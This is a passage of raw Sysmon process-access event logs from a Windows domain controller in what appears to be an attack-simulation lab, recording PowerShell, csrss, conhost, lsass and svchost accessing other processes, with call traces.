06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-00105FCE0400}\r\nSourceProcessId: 4908\r\nSourceThreadId: 5000\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001022DB0400}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98d52f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f3cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ca510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981b488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98212d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f63c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f63c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f6251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981e81d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f42fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f3cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ca510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981dab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981da127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-00105FCE0400}","SourceProcessId":"4908","SourceThreadId":"5000","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001022DB0400}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98d52f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f3cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ca510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981b488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98212d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f63c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f63c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f6251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981e81d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f42fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f4025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f3cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ca510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981dab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981da127(wow64)","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001022DB0400}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001022DB0400}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.568\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001046CB0400}\r\nSourceProcessId: 4832\r\nSourceThreadId: 4852\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001022DB0400}\r\nTargetProcessId: 5004\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.568","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001046CB0400}","SourceProcessId":"4832","SourceThreadId":"4852","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001022DB0400}","TargetProcessId":"5004","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2747,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 